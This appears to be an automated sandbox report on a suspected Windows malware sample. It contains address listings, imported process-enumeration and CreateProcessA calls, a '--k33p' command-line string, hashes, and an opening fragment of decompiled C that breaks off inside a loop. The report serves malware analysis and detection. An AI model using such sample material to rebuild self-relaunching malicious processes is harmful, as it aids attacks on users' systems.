0x0040442b
0x00404430
0x00404432
0x00404434
0x00404436
0x00404439
0x00404454
0x0040445a
0x0040445a
0x00404439
0x00404434
0x00404461
0x00404469
0x00404472
0x00404477
0x0040447f
0x0040449c
0x00000000
0x0040449c
0x0040433f
0x00404344
0x00404345
0x0040434b
0x00404350
0x00404358
0x0040435e
0x00404364
0x00404369
0x0040436b
0x0040437a
0x0040437a
0x0040437f
0x00404380
0x00404386
0x0040438c
0x00404392
0x00404398
0x0040439d
0x0040439f
0x00000000
0x00000000
0x004043a9
0x004043ae
0x004043b0
0x00000000
0x00000000
0x00000000
0x004043b0
0x00404371
0x00404376
0x00404378
0x00000000
0x00000000
0x00000000
0x00404378
0x00404275
0x00404279
0x00000000
0x00404279
0x00403ff5
0x00403ffa
0x0040425a
0x0040425f
0x00000000
0x00000000
0x00404267
0x00000000
0x00404267
0x00404004
0x00404009
0x0040400b
0x0040400d
0x0040416b
0x0040416b
0x00404170
0x00000000
0x00000000
0x0040418f
0x00404194
0x00404196
0x00000000
0x00000000
0x0040419c
0x004041c8
0x004041cd
0x004041cf
0x0040424c
0x00404253
0x00000000
0x00404253
0x004041d1
0x004041f9
0x004041fe
0x00404200
0x00404219
0x0040421e
0x00404220
0x00404220
0x00404226
0x00404226
0x00404231
0x00404236
0x0040423b
0x00404247
0x00404247
0x00000000
0x0040423b
0x0040401a
0x0040401f
0x00404023
0x00404025
0x0040405a
0x0040405a
0x0040405f
0x0040406a
0x00404074
0x00404074
0x00404077
0x0040407c
0x0040407c
0x0040407e
0x00000000
0x00000000
0x00404080
0x00404087
0x004040da
0x004040e3
0x00000000
0x004040e3
0x00404089
0x00404096
0x0040409b
0x0040409c
0x0040409e
0x004040a3
0x004040a5
0x004040b6
0x004040c4
0x004040c9
0x004040d0
0x004040d2
0x00000000
0x00000000
0x004040d4
0x004040d5
0x004040d8
0x00000000
0x00000000
0x00000000
0x004040d8
0x004040a7
0x004040ac
0x004040ad
0x004040b2
0x004040b4
0x00000000
0x00000000
0x00000000
0x004040b4
0x004040eb
0x004040eb
0x004040ed
0x004040f2
0x004040f2
0x004040f4
0x00000000
0x00000000
0x004040ff
0x00404100
0x00404100
0x00404107
0x0040410c
0x0040410c
0x0040410c
0x0040410e
0x0040410e
0x00404110
0x00000000
0x00000000
0x0040411b
0x0040411c
0x0040411c
0x00404123
0x00404123
0x00404123
0x00404123
0x00404126
0x00404126
0x00404128
0x00404128
0x0040412a
0x00000000
0x00000000
0x00404138
0x00404144
0x00404145
0x00404145
0x0040414c
0x00404151
0x00404158
0x00404160
0x00404166
0x00404166
0x00000000
0x00404151
0x0040402d
0x00404036
0x0040403b
0x00404042
0x00404049
0x00404049
0x0040404b
0x00000000
0x00000000
0x00404055
0x00404057
0x00404057
0x00000000
0x0040427e
0x0040427e
0x0040427e
0x00403fb2
0x0040395a
0x0040395f
0x0040395f
0x00403964
0x00000000
0x00000000
0x00403966
0x00403969
0x00403969
0x0040396c
0x00403971
0x00403971
0x00403976
0x00000000
0x00000000
0x00403978
0x0040397b
0x0040397b
0x0040397e
0x00403983
0x00403983
0x00403988
0x00000000
0x00000000
0x0040398a
0x0040398d
0x0040398d
0x00403990
0x00403995
0x00403995
0x0040399a
0x00000000
0x00000000
0x0040399c
0x0040399f
0x0040399f
0x004039a2
0x004039a7
0x004039a7
0x004039ac
0x00000000
0x00000000
0x004039ae
0x004039b1
0x004039b1
0x004039c5
0x004039d5
0x004039e5
0x004039f5
0x004039ff
0x00000000
0x004039ff
0x004038ac
0x004038b1
0x004038b1
0x004038b6
0x00000000
0x00000000
0x004038b8
0x004038bb
0x004038bb
0x004038c9
0x00000000
0x004038c9
0x0040385c
0x00403861
0x00403861
0x00403866
0x00000000
0x00000000
0x00403868
0x0040386b
0x0040386b
0x00403879
0x00000000
0x00403879
0x004035b5
0x004035ba
0x004035ba
0x004035bf
0x00000000
0x00000000
0x004035c1
0x004035c4
0x004035c4
0x004035d2
0x004035d7
0x004035dc
0x004035dc
0x004035e1
0x00000000
0x00000000
0x004035e3
0x004035e6
0x004035e6
0x004035e9
0x004035ee
0x004035ee
0x004035f3
0x00000000
0x00000000
0x004035f5
0x004035f8
0x004035f8
0x004035fb
0x00403600
0x00403600
0x00403605
0x00000000
0x00000000
0x00403607
0x0040360a
0x0040360a
0x0040360d
0x00403612
0x00403612
0x00403617
0x00000000
0x00000000
0x00403619
0x0040361c
0x0040361c
0x0040361f
0x00403624
0x00403624
0x00403629
0x00000000
0x00000000
0x0040362b
0x0040362e
0x0040362e
0x0040363b
0x00403641
0x0040364e
0x0040365e
0x0040366e
0x00403673
0x00403678
0x0040367d
0x0040367f
0x00403681
0x00403691
0x00403691
0x00403693
0x00403698
0x00403698
0x0040369d
0x00000000
0x00000000
0x0040369f
0x004036a2
0x004036a2
0x004036a5
0x004036aa
0x004036aa
0x004036af
0x00000000
0x00000000
0x004036b1
0x004036b4
0x004036b4
0x004036bd
0x004036c2
0x004036c4
0x004036c6
0x00000000
0x00000000
0x004036d2
0x004036d7
0x004036d9
0x004036db
0x00000000
0x00000000
0x004036ed
0x004036ef
0x004036f1
0x00000000
0x00000000
0x004036f7
0x00403709
0x0040370f
0x0040371a
0x0040371c
0x0040371e
0x004037b2
0x004037b4
0x004037c0
0x00000000
0x004037c0
0x00403724
0x0040372c
0x0040372e
0x0040372e
0x00403732
0x00000000
0x00000000
0x00403734
0x00403738
0x0040373c
0x0040373e
0x004037a9
0x004037a9
0x00000000
0x004037a9
0x00403740
0x00403742
0x00000000
0x00000000
0x00403744
0x0040374c
0x00403750
0x00403755
0x00403767
0x00403767
0x0040377c
0x00403783
0x00403785
0x00403787
0x00403789
0x0040378b
0x0040378f
0x00403791
0x00403795
0x00403797
0x00403797
0x00403795
0x0040378f
0x0040379c
0x004037a1
0x00000000
0x004037a1
0x00403757
0x00403760
0x00403759
0x00403759
0x00403759
0x00403765
0x00000000
0x00000000
0x00000000
0x00000000
0x00403765
0x00000000
0x004034ca
0x004034ce
0x004034d3
0x004034da
0x004034dc
0x004044a1
0x004044a3
0x004044a8
0x004044a8
0x004044af
0x004044c6
0x004044cb
0x004044d2
0x004044d4
0x00404517
0x00404517
0x0040451f
0x0040451f
0x00404521
0x00404545
0x0040454a
0x0040454f
0x0040454f
0x00404554
0x00000000
0x00000000
0x00404556
0x00404559
0x00404559
0x00404561
0x00404561
0x00404566
0x00000000
0x00000000
0x00404568
0x00404568
0x00404569
0x00404569
0x0040456e
0x00404575
0x004047c9
0x004047c9
0x004047d6
0x004047de
0x004047e3
0x004047e5
0x004047f1
0x004047f1
0x004047fd
0x004047fe
0x00404835
0x004048cf
0x004048d4
0x004048d7
0x004048dc
0x004048dc
0x004048e1
0x00000000
0x00000000
0x004048e3
0x004048e6
0x004048e6
0x004048ee
0x004048ee
0x004048f3
0x00000000
0x00000000
0x004048f5
0x004048f5
0x004048f6
0x004048f6
0x004048fb
0x00404900
0x00404905
0x0040490c
0x0040490d
0x00404912
0x00404913
0x00404926
0x0040492b
0x0040492d
0x00404b8d
0x00404b94
0x00404b99
0x00404ba0
0x00404ba2
0x00404ce5
0x00404ce5
0x00404cea
0x00404cec
0x00404cee
0x00404cf0
0x00404cf0
0x00404cf2
0x00404cf9
0x00404cfe
0x00404d00
0x00404d02
0x00404d04
0x00404d04
0x00404d06
0x00404d0d
0x00404d1a
0x00404d1b
0x00404d27
0x00404d2f
0x00404d30
0x00404d35
0x00404d39
0x00404d3c
0x00404d3c
0x00404d3e
0x00000000
0x00000000
0x00404d48
0x00404d4a
0x00404d4f
0x00404d4f
0x00404d58
0x00404d65
0x00404d6a
0x00404d6c
0x00404dad
0x00404dad
0x00404dba
0x00404dbf
0x00404dc1
0x00404e76
0x00404e7a
0x00404e84
0x00404e8c
0x00404e91
0x00404e96
0x00404e9c
0x00404ea1
0x00404ea2
0x00404ea8
0x00404eae
0x00404ec6
0x00404ecb
0x00404ed2
0x00404ed4
0x00404f78
0x00404f78
0x00404f7d
0x00404f80
0x00404fa3
0x00404fb0
0x00404fb5
0x00404fba
0x00404fc1
0x00404fc7
0x00404fdf
0x00404fe4
0x00404feb
0x00404fed
0x00404ff6
0x00404ff6
0x00404ffb
0x00404ffe
0x00000000
0x00000000
0x00405006
0x0040500b
0x00405010
0x00405017
0x0040501d
0x00405035
0x0040503a
0x00405041
0x00405043
0x0040504c
0x0040504c
0x00405051
0x00405054
0x00000000
0x00000000
0x00405080
0x00405085
0x00405092
0x00405097
0x0040509c
0x004050a3
0x004050a9
0x004050c1
0x004050c6
0x004050cd
0x004050cf
0x004050d1
0x004050d8
0x004050d8
0x004050e5
0x004050ea
0x004050ef
0x004050f6
0x004050fc
0x00405114
0x00405119
0x00405120
0x00405122
0x00405124
0x00405153
0x00405153
0x0040515b
0x0040515b
0x00405163
0x0040517c
0x0040517c
0x00405186
0x0040518e
0x00405193
0x00405198
0x00405199
0x004051a0
0x004051b0
0x004051b7
0x004051c7
0x004051ce
0x004051d3
0x004051d8
0x004051d8
0x004051dd
0x00000000
0x00000000
0x004051df
0x004051e2
0x004051e2
0x004051fe
0x00405203
0x00405205
0x00405229
0x00405229
0x0040522e
0x00405237
0x0040523e
0x00405243
0x00405244
0x00405249
0x00405249
0x0040525d
0x0040525d
0x0040526e
0x0040527a
0x0040527f
0x0040527f
0x00405286
0x004054f1
0x0040550f
0x00405514
0x00405519
0x00405519
0x0040551e
0x00000000
0x00000000
0x00405520
0x00405523
0x00405523
0x00405526
0x0040552e
0x00405538
0x0040553d
0x00405542
0x00000000
0x00000000
0x00405548
0x00405548
0x00405550
0x00405558
0x0040555d
0x0040555f
0x004057d5
0x004057d5
0x004057f2
0x004057f2
0x004057fa
0x004057fa
0x00405802
0x00405804
0x00405806
0x0040580b
0x00405810
0x00405815
0x0040581a
0x0040581f
0x0040582c
0x00405831
0x00405831
0x00405834
0x00405839
0x00405841
0x00405849
0x00405863
0x00405868
0x0040586a
0x00405873
0x00405878
0x0040589d
0x004058a2
0x004058a3
0x004058a8
0x004058a8
0x004058bb
0x004058c7
0x004058c7
0x0040586a
0x004058cc
0x004058d1
0x004058d8
0x00405933
0x00405938
0x0040593a
0x00405957
0x00405957
0x0040595e
0x0040595f
0x00405964
0x00405964
0x00405965
0x00405966
0x00405967
0x00405969
0x0040596b
0x00405971
0x00405978
0x00405984
0x00405989
0x00405989
0x0040598e
0x00000000
0x00000000
0x00405996
0x004059b8
0x004059bd
0x004059bf
0x004059e7
0x00405a04
0x00405a10
0x00405a15
0x00405a17
0x00405a1f
0x00405a24
0x00405a2b
0x00405a32
0x00405a9f
0x00405aa4
0x00405aa6
0x00000000
0x00000000
0x00405aa8
0x00405aa9
0x00405abe
0x00405ada
0x00405ae6
0x00405af6
0x00405afb
0x00405afd
0x00000000
0x00000000
0x00405aff
0x00405b06
0x00000000
0x00405b06
0x00405a3f
0x00405a44
0x00405a46
0x00000000
0x00000000
0x00405a53
0x00405a58
0x00405a59
0x00405a71
0x00405a8d
0x00000000
0x00405a8d
0x004059de
0x004059e3
0x004059e5
0x00000000
0x00000000
0x00000000
0x004059e5
0x0040594e
0x00405953
0x00405955
0x00000000
0x00000000
0x00000000
0x00405955
0x004058dc
0x004058e4
0x004058f4
0x004058f9
0x004058fb
0x00000000
0x00000000
0x00405908
0x0040590d
0x0040590e
0x00405914
0x00405915
0x00405916
0x00405918
0x0040591a
0x00000000
0x00405b0b
0x00405b15
0x00405b1f
0x00405b24
0x00405b24
0x00405b24
0x00405b24
0x00405b2e
0x00405b4c
0x00405b51
0x00405b53
0x0040552e
0x00405538
0x0040553d
0x00405542
0x00000000
0x00000000
0x00000000
0x00405542
0x0040552e
0x00405b59
0x00405b66
0x00405b78
0x00405b7d
0x00405b7f
0x00405b85
0x00405b86
0x00405b88
0x00405b8c
0x00405bae
0x00405bb8
0x00405bbd
0x00405bc4
0x00405be5
0x00405bc6
0x00405bd1
0x00405bd9
0x00405bd9
0x00405b8e
0x00405b9e
0x00405b9e
0x00405b8c
0x00405bee
0x00000000
0x00405bee
0x00405583
0x00405588
0x0040558a
0x004057de
0x004057e2
0x00000000
0x00000000
0x004057e4
0x004057e4
0x00000000
0x004057e4
0x00405590
0x00405595
0x0040559a
0x004055a7
0x004055bf
0x004055c4
0x004055c6
0x004055dc
0x004055e8
0x004055ed
0x00405669
0x00405669
0x00405670
0x004056a9
0x004056a9
0x004056cf
0x004056d1
0x004056e7
0x004056e7
0x004056ec
0x004056ee
0x004057cc
0x004057d0
0x00000000
0x004057d0
0x004056f4
0x004056fd
0x004056ff
0x00405705
0x00405708
0x0040572b
0x0040572b
0x00405738
0x00405750
0x00405755
0x00405757
0x00405761
0x00405761
0x00405766
0x00405769
0x0040576d
0x0040576d
0x0040577c
0x00405781
0x00000000
0x00000000
0x00405783
0x00405788
0x0040578a
0x00000000
0x00000000
0x0040578c
0x00405795
0x00405797
0x0040579d
0x004057a0
0x00000000
0x00000000
0x004057a2
0x004057a4
0x004057a5
0x004057a7
0x004057a9
0x004057ae
0x004057b5
0x004057be
0x004057c3
0x00000000
0x004057c3
0x00405712
0x00405716
0x0040571a
0x0040571c
0x0040571d
0x0040571f
0x00405721
0x00000000
0x00405721
0x004056e0
0x004056e5
0x00000000
0x00000000
0x00000000
0x004056e5
0x00405672
0x0040567b
0x0040567d
0x00405683
0x00405686
0x00000000
0x00000000
0x00405690
0x00405694
0x00405698
0x0040569a
0x0040569b
0x0040569d
0x0040569f
0x00000000
0x0040569f
0x004055ef
0x004055f4
0x004055f6
0x00000000
0x00000000
0x00405605
0x0040560b
0x0040560d
0x0040560f
0x00405611
0x00405619
0x0040561f
0x00405622
0x00405624
0x00405624
0x00405622
0x0040562a
0x0040562f
0x00405631
0x0040565f
0x00000000
0x0040565f
0x0040563b
0x00405640
0x00405642
0x00405647
0x0040564d
0x0040564f
0x00405654
0x00405656
0x00405656
0x00405654
0x00405658
0x00000000
0x00405658
0x004055cc
0x004055d1
0x004055d6
0x00000000
0x00000000
0x00000000
0x004057ee
0x004057ee
0x004057ee
0x004057ee
0x00000000
0x004057ee
0x0040552e
0x0040528c
0x00405291
0x00405291
0x00405296
0x00000000
0x00000000
0x00405298
0x0040529b
0x0040529b
0x0040529e
0x004052a3
0x004052a3
0x004052a8
0x00000000
0x00000000
0x004052aa
0x004052ad
0x004052ad
0x004052b0
0x004052c2
0x004052c7
0x004052c9
0x004052e5
0x004052f1
0x004052f1
0x004052f6
0x004052fb
0x004052fb
0x00405300
0x00000000
0x00000000
0x00405302
0x00405305
0x00405305
0x00405308
0x0040530d
0x0040530d
0x00405312
0x00000000
0x00000000
0x00405314
0x00405317
0x00405317
0x0040531a
0x0040531f
0x0040531f
0x00405324
0x00000000
0x00000000
0x00405326
0x00405329
0x00405329
0x0040532c
0x00405331
0x00405331
0x00405336
0x00000000
0x00000000
0x00405338
0x0040533b
0x0040533b
0x0040533e
0x00405343
0x00405343
0x00405348
0x00000000
0x00000000
0x0040534a
0x0040534d
0x0040534d
0x00405362
0x00405367
0x00405369
0x0040536d
0x00405385
0x0040539d
0x004053b5
0x004053cd
0x004053d9
0x004053d9
0x004053de
0x004053e3
0x004053e3
0x004053e8
0x00000000
0x00000000
0x004053ea
0x004053ed
0x004053ed
0x00405402
0x00405407
0x00405409
0x00000000
0x00000000
0x00405413
0x00405418
0x00405420
0x00405422
0x00405427
0x00405432
0x00405432
0x00405437
0x00000000
0x00000000
0x00405439
0x0040543c
0x0040543c
0x0040543f
0x00405484
0x00405488
0x00405488
0x004054ab
0x004054b0
0x004054b2
0x00000000
0x00000000
0x00405449
0x0040544e
0x00405457
0x0040545c
0x0040545e
0x00405468
0x00405468
0x0040545e
0x0040546d
0x0040546d
0x0040546d
0x00405471
0x00405479
0x00405479
0x004054b4
0x004054c7
0x004054c7
0x004054c8
0x004054d9
0x004054e0
0x004054ec
0x00000000
0x004054ec
0x00405220
0x00405225
0x00405227
0x00000000
0x00000000
0x00000000
0x00405227
0x00405126
0x00405129
0x00000000
0x00000000
0x0040512b
0x00405140
0x0040514c
0x00000000
0x0040514c
0x004050d3
0x004050d6
0x00000000
0x00000000
0x00000000
0x004050d6
0x00405045
0x00405046
0x00404ee1
0x00404efc
0x00404f01
0x00404f06
0x00404f27
0x00404f27
0x00404f33
0x00404f38
0x00404f40
0x00404f42
0x00404f47
0x00404f4f
0x00404f54
0x00404f57
0x00404f59
0x00404f5b
0x00404f5d
0x00404f63
0x00404f68
0x00404f68
0x00404f6b
0x00404f6d
0x00404f72
0x0040505c
0x0040505c
0x00405061
0x0040507b
0x00000000
0x0040507b
0x00000000
0x00405046
0x00404fef
0x00404ff0
0x00000000
0x00000000
0x00000000
0x00404ff0
0x00404f82
0x00404f82
0x00404f8a
0x00404f8c
0x00404f98
0x00000000
0x00404f98
0x00404eda
0x00404edb
0x00000000
0x00000000
0x00000000
0x00404edb
0x00404dc7
0x00404dd7
0x00404ddc
0x00404dde
0x00000000
0x00000000
0x00404df7
0x00404dfc
0x00404e03
0x00404e05
0x00000000
0x00000000
0x00404e07
0x00404e08
0x00000000
0x00000000
0x00404e0a
0x00404e20
0x00404e2c
0x00404e48
0x00404e4d
0x00404e54
0x00404e5b
0x00404e62
0x00404e62
0x00404e64
0x00000000
0x00000000
0x00404e6e
0x00404e70
0x00404e71
0x00404e73
0x00404e73
0x00000000
0x00404e62
0x00404d6e
0x00404d75
0x00404d76
0x00404d78
0x00404d7d
0x00404d7e
0x00404d83
0x00404d85
0x00000000
0x00000000
0x00404d87
0x00404d89
0x00404d8e
0x00404d90
0x00404d92
0x00404d94
0x00404d99
0x00404d9a
0x00404d9f
0x00404da6
0x00404da8
0x00000000
0x00000000
0x00404daa
0x00404dab
0x00000000
0x00000000
0x00000000
0x00404dab
0x00404bae
0x00404bba
0x00404bbf
0x00404bc6
0x00404bcd
0x00404bd4
0x00404bd4
0x00404bd6
0x00000000
0x00000000
0x00404be0
0x00404be2
0x00404be3
0x00404be5
0x00404be5
0x00404be8
0x00404bee
0x00404bf5
0x00404bf6
0x00404bfb
0x00404bfd
0x00404c18
0x00404c1d
0x00404c25
0x00404c2b
0x00000000
0x00404c2b
0x00404c06
0x00404c07
0x00404c0e
0x00404c0f
0x00404c14
0x00404c16
0x00404c4c
0x00404c51
0x00404c58
0x00404c5a
0x00000000
0x00000000
0x00404c5c
0x00404c5f
0x00000000
0x00000000
0x00404c64
0x00404c69
0x00404c6d
0x00404c6f
0x00404c8c
0x00404c92
0x00404c9b
0x00404ca0
0x00404ca4
0x00404ca6
0x00404cad
0x00404caf
0x00404cb4
0x00404cb7
0x00404cbe
0x00404cc3
0x00404cc3
0x00404cc5
0x00404cd0
0x00404cd4
0x00404cd5
0x00000000
0x00404cd5
0x00404cc9
0x00000000
0x00404cc9
0x00404cdb
0x00000000
0x00404cdb
0x00404c71
0x00404c78
0x00404c78
0x00000000
0x00404c16
0x00404938
0x00404940
0x00404945
0x0040494b
0x00404950
0x00404951
0x00404956
0x00404957
0x0040495c
0x00404961
0x00404961
0x00404966
0x00000000
0x00000000
0x00404968
0x0040496b
0x0040496b
0x00404977
0x0040497c
0x00404983
0x00404985
0x004049a5
0x00404987
0x0040498d
0x00404999
0x00404999
0x004049af
0x004049b7
0x004049cf
0x004049d4
0x004049db
0x004049dd
0x00404b6f
0x00404b76
0x00404b88
0x00000000
0x00404b88
0x004049e3
0x004049e6
0x00000000
0x00000000
0x00404a01
0x00404a06
0x00404a0b
0x00404a0f
0x00404a11
0x00404a13
0x00404a13
0x00404a1b
0x00404a20
0x00404a25
0x00404a27
0x00404a29
0x00404a2d
0x00404a30
0x00404a30
0x00404a32
0x00000000
0x00000000
0x00404a39
0x00404a3b
0x00404a3c
0x00404a3e
0x00404a3f
0x00404a3f
0x00404a44
0x00404a4b
0x00404a4e
0x00404a4f
0x00404a54
0x00404a5b
0x00404a5d
0x00404a64
0x00404a66
0x00404a67
0x00404a6b
0x00404a6b
0x00404a6f
0x00404a7a
0x00404a7d
0x00404a81
0x00404a83
0x00404a84
0x00404a89
0x00404a8c
0x00404a8c
0x00404a8e
0x00000000
0x00000000
0x00404a95
0x00404a97
0x00404a98
0x00404a98
0x00404a98
0x00404ab4
0x00404abb
0x00404ac0
0x00404ac5
0x00404ae6
0x00404ae6
0x00404af2
0x00404b06
0x00404b0e
0x00404b1a
0x00404b1f
0x00404b44
0x00404b49
0x00404b4a
0x00404b4f
0x00404b4f
0x00404b62
0x00404b67
0x00000000
0x00404b67
0x004047e7
0x004047ef
0x00404805
0x00404806
0x0040480d
0x0040480e
0x00404823
0x00404823
0x0040482a
0x0040482b
0x00404830
0x00404833
0x00000000
0x00000000
0x00404815
0x0040481c
0x0040481d
0x0040481e
0x0040481e
0x00000000
0x00404823
0x00000000
0x004047ef
0x0040458d
0x00404592
0x00404594
0x00000000
0x00000000
0x0040459f
0x004045a7
0x004045ac
0x004045b2
0x004045b7
0x004045b8
0x004045bd
0x004045be
0x004045c3
0x004045c8
0x004045c8
0x004045cd
0x00000000
0x00000000
0x004045cf
0x004045d2
0x004045d2
0x004045de
0x004045e3
0x004045ea
0x004045ec
0x0040460c
0x004045ee
0x004045f4
0x00404600
0x00404600
0x00404616
0x0040461e
0x00404636
0x0040463b
0x00404642
0x00404644
0x004047bd
0x004047c4
0x00000000
0x004047c4
0x0040464a
0x0040464d
0x00000000
0x00000000
0x00404668
0x0040466d
0x00404672
0x00404676
0x00404678
0x0040467a
0x0040467a
0x00404682
0x00404687
0x0040468c
0x0040468e
0x00404690
0x00404694
0x00404697
0x00404697
0x00404699
0x00000000
0x00000000
0x004046a0
0x004046a2
0x004046a3
0x004046a5
0x004046a6
0x004046a6
0x004046ab
0x004046b2
0x004046b5
0x004046b6
0x004046bb
0x004046c2
0x004046c4
0x004046cb
0x004046cd
0x004046ce
0x004046d2
0x004046d2
0x004046d6
0x004046e1
0x004046e4
0x004046e8
0x004046ea
0x004046eb
0x004046f0
0x004046f3
0x004046f3
0x004046f5
0x00000000
0x00000000
0x004046fc
0x004046fe
0x004046ff
0x004046ff
0x004046ff
0x0040471b
0x00404722
0x00404727
0x0040472c
0x0040474d
0x0040474d
0x00404759
0x0040476d
0x00404775
0x00404786
0x00404792
0x00404797
0x00404798
0x0040479d
0x0040479d
0x004047b0
0x004047b5
0x00000000
0x004047b5
0x004044d6
0x004044d9
0x00000000
0x00000000
0x004044e3
0x004044ea
0x00404504
0x00404510
0x00000000
0x00404510
0x004034e7
0x004034f5
0x004034f5
0x004034f7
0x0040350a
0x0040350f
0x0040350f
0x00403511
0x00000000
0x00000000
0x0040351a
0x00403521
0x0040359f
0x00000000
0x0040359f
0x00403532
0x00403532
0x00403540
0x00403545
0x00403547
0x00000000
0x00000000
0x00403550
0x00403556
0x0040355b
0x00403563
0x0040449c
0x0040449c
0x00000000
0x0040449c

APIs

GetProcAddress.KERNEL32(?,004107CF), ref: 00403490
GetModuleFileNameA.KERNEL32(00000000,?,00000104,kernel32.dll,004120F0), ref: 004034AE
GetCommandLineA.KERNEL32(00000000,?,00000104,kernel32.dll,004120F0), ref: 004034B3
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004034CE
GetCurrentProcessId.KERNEL32(00000002,00000000,00000000,?,00000104,?,004107CF), ref: 004034E2
Process32First.KERNEL32(?,?), ref: 0040350A
Process32Next.KERNEL32 ref: 00403532
CloseHandle.KERNEL32(?,?,?), ref: 00403540
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?), ref: 00403550
CloseHandle.KERNEL32(00000000,00000000,000000FF,?,?,?), ref: 00403556
GetStartupInfoA.KERNEL32(?), ref: 00403563
OpenProcess.KERNEL32(00100000,00000000,?,?,?), ref: 0040359A
CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00000000,000000FF,?,?), ref: 0040449C
ExitProcess.KERNEL32(00000000,00000002,00000000,00000000,?,00000104,?,004107CF), ref: 004044A3

Strings

Sk(, xrefs: 0040354F
--k33p, xrefs: 004034B8

Memory Dump Source

Source File: 00000000.00000002.313724914.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.313719317.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313746840.0000000000408000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313754806.0000000000411000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313759705.0000000000412000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313765323.0000000000414000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313770673.0000000000416000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313775015.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KJEfMLiuRS.jbxd

Yara matches

Similarity

API ID: Process$CloseCreateHandleProcess32$AddressCommandCurrentExitFileFirstInfoLineModuleNameNextObjectOpenProcSingleSnapshotStartupToolhelp32Wait
String ID: --k33p$Sk(
API String ID: 3843483697-371387422
Opcode ID: c43e8d6dc754de3ef77532aabcff7f91e360964ce776d517ecbe1307d5e20074
Instruction ID: 4eb8e424595eb0792b6e881c17a7f057aca251d7945a059b1dd593835cc0c334
Opcode Fuzzy Hash: c43e8d6dc754de3ef77532aabcff7f91e360964ce776d517ecbe1307d5e20074
Instruction Fuzzy Hash: 7A215370204741A9E630ABA18C46FDF759CDF84309F90483FB699B51D2DBBC99408E7B

Uniqueness

Uniqueness Score: -1.00%

Function 00403FF5 Relevance: 59.7, APIs: 28, Strings: 6, Instructions: 189
registrystringsynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E00403FF5() {
				void* _t414;
				char* _t419;
				void* _t422;
				signed char* _t441;
				void* _t444;
				void* _t446;
				void* _t447;
				void* _t448;
				void* _t452;
				void* _t453;
				void* _t454;
				CHAR* _t457;
				void* _t459;
				long _t460;
				CHAR* _t461;
				void* _t463;
				long _t464;
				CHAR* _t469;
				void* _t471;
				CHAR* _t472;
				void* _t474;
				char* _t484;
				void* _t485;
				signed char* _t490;
				void* _t493;
				void* _t494;
				void* _t500;
				void* _t501;
				void* _t506;
				void* _t511;
				void* _t513;
				void* _t515;
				void* _t519;
				void* _t521;
				void* _t526;
				long _t530;
				int _t531;
				void* _t537;
				void* _t539;
				void* _t542;
				void* _t549;
				void* _t551;
				void* _t553;
				void* _t558;
				void* _t561;
				void* _t563;
				void* _t566;
				void* _t568;
				void* _t572;
				void* _t577;
				void* _t579;
				void* _t581;
				int _t585;
				void* _t586;
				void* _t588;
				char* _t589;
				char* _t590;
				void* _t591;
				char* _t592;
				char* _t593;
				char* _t594;
				char* _t595;
				char* _t596;
				void* _t597;
				char* _t598;
				void* _t599;
				char* _t601;
				CHAR* _t602;
				void* _t606;
				void* _t608;
				int _t611;
				void* _t625;
				int _t626;
				void* _t629;
				CHAR* _t635;
				void* _t637;
				long _t638;
				void* _t643;
				void* _t651;
				void* _t652;
				signed char _t660;
				void* _t666;
				void* _t670;
				void* _t672;
				int _t673;
				void* _t676;
				signed char _t687;
				int _t688;
				signed char* _t689;
				void* _t690;
				void* _t692;
				void* _t697;
				void* _t699;
				void* _t700;
				long* _t701;
				signed int* _t704;
				long _t714;
				int _t715;
				signed char _t725;
				void* _t728;
				void* _t730;
				int _t731;
				CHAR* _t732;
				void* _t733;
				void* _t735;
				void* _t738;
				void* _t740;
				void* _t741;
				void* _t742;
				signed int* _t745;
				void* _t754;
				int _t755;
				signed char _t765;
				void* _t775;
				void* _t777;
				int _t778;
				CHAR* _t780;
				void* _t786;
				void* _t793;
				CHAR* _t798;
				void* _t799;
				void* _t801;
				void* _t803;
				void* _t809;
				void* _t811;
				void* _t813;
				void* _t816;
				signed int _t819;
				void* _t823;
				long _t824;
				int _t826;
				void* _t836;
				void* _t837;
				CHAR* _t841;
				char* _t842;
				CHAR* _t843;
				CHAR* _t844;
				CHAR* _t845;
				CHAR* _t846;
				CHAR* _t847;
				CHAR* _t848;
				CHAR* _t849;
				long* _t850;
				void** _t851;
				char* _t852;
				char* _t853;
				CHAR* _t854;
				void* _t857;
				char* _t858;
				char* _t860;
				char* _t861;
				char* _t862;
				long* _t863;
				CHAR* _t864;
				int _t865;
				CHAR* _t866;
				CHAR* _t867;
				void* _t868;
				signed int* _t870;
				char* _t871;
				void* _t872;
				CHAR* _t873;
				CHAR* _t874;
				void* _t875;
				signed int* _t877;
				char* _t878;
				CHAR* _t879;
				CHAR* _t880;
				struct _STARTUPINFOA* _t881;
				void* _t882;
				void* _t883;
				long _t884;
				signed int _t885;
				signed int _t886;
				signed int _t887;
				CHAR* _t888;
				signed char _t889;
				long* _t893;
				long* _t894;
				void* _t895;
				long _t897;
				long _t898;
				void* _t899;
				signed int* _t923;
				signed char* _t924;
				signed char* _t925;
				signed int* _t927;
				signed int* _t930;
				void* _t935;
				void* _t936;
				char* _t937;
				signed char* _t938;
				void* _t939;
				void* _t940;
				long _t941;
				signed int _t942;
				signed int* _t943;
				void** _t944;
				void* _t946;
				void** _t947;
				void** _t948;
				char* _t949;
				CHAR* _t950;
				signed char* _t951;
				long* _t952;
				signed int* _t953;
				void* _t954;
				void* _t955;
				char* _t956;
				signed int* _t957;
				void* _t958;
				char* _t959;
				signed int* _t960;
				CHAR* _t962;
				long _t963;
				void* _t964;
				signed int* _t965;
				long _t966;
				struct _FILETIME* _t967;
				void* _t968;
				void* _t969;
				long* _t970;

				L0:
				while(1) {
					L0:
					if( *((intOrPtr*)(_t969 + 0x34)) > 0x11) {
						__eflags =  *(_t969 + 0x1c);
